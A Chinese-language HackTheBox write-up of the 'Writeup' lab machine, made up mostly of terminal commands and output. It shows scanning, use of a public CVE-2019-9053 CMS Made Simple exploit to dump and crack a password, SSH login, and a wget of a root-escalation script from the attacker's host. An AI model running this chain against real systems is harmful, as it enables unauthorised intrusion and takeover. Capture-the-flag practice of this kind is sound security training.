title: HackTheBox-Writeup author: Crazyinside layout: true categories: HackTheBox cover: https://www.worldisend.com/img/Writeup.png tags:
•LInux
Crazy:~/HackThebox/Writeup$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.138
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-22 01:11:31 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.138
Discovered open port 80/tcp on 10.10.10.138
Crazy:~/HackThebox/Writeup$ sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
[sudo] crazyinside 的密码:
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 09:13 CST
Nmap scan report for 10.10.10.138
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd5310700bd0470ae27e4ab6429823c7 (RSA)
| 256 372e1468aeb9c2342b6ed992bcbfbd28 (ECDSA)
|_ 256 93eaa84042c1a83385b35600621ca0ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
zsh: segmentation fault sudo nmap -sC -sV 10.10.10.138 -p22,80 -oN Writeup
Crazy:~/HackThebox/Writeup$ curl http://10.10.10.138/robots.txt
# __
# _( |@@|
# (__/__ --/ __
# ___|----| | __
# }{ / )_ / _
# /__/ __O (__
# (--/--) __/
# _)( )(_
# `---''---`
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
Crazy:~/HackThebox/Writeup$
Crazy:~/HackThebox/Writeup$ whatweb http://10.10.10.138/writeup/
http://10.10.10.138/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.10.10.138], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]
没有更多的版本信息。
Crazy:~/HackThebox/Writeup$ searchsploit CMS Made Simple
------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site Scripting | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclusion | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Request Forgery | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Side Template Injection | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated) | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting (Authenticated) | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via SVG File Upload (Authenticated) | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload | php/webapps/46546.py
------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------ ---------------------------------
Paper Title | Path
------------------------------------------------------------------------------------------------------ ---------------------------------
CMS Made Simple v2.2.13 - Paper | docs/english/49947-cms-made-simp
------------------------------------------------------------------------------------------------------ ---------------------------------
漏洞编号为CVE-2019-9053.自带的脚本是python2的,无法进行使用,Github上有一个python3版本的:
https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py
./exploit.py -u http://10.10.10.138/writeup --crack --wordlist /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
Crazy:~/HackThebox/Writeup$ ssh jkr@writeup.htb
jkr@writeup.htb's password:
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 21 21:49:32 2022 from 10.10.16.5
jkr@writeup:~$ sudo -l
-bash: sudo: command not found
jkr@writeup:~$ cat user.txt
fe...................................
jkr@writeup:~$
jkr@writeup:~$ wget http://10.10.16.3/pwk.py
--2022-08-21 21:51:50-- http://10.10.16.3/pwk.py
Connecting to 10.10.16.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3448 (3.4K) [text/x-python]
Saving to: ‘pwk.py’
pwk.py 100%[=============================================================>] 3.37K --.-KB/s in 0.01s
2022-08-21 21:51:51 (236 KB/s) - ‘pwk.py’ saved [3448/3448]
jkr@writeup:~$ ls
pwk.py sharedvuln user.txt
jkr@writeup:~$ python pwk.py
File "pwk.py", line 43
cargv = (c_char_p * (len(argv) + 1))(*argv, None)
SyntaxError: only named arguments may follow *expression
jkr@writeup:~$ python3 pwk.py
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev),1000(jkr)
# cat /root/root.txt
bf84..............................
#
原文始发于微信公众号(老鑫安全):HackTheBox-Writeup
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论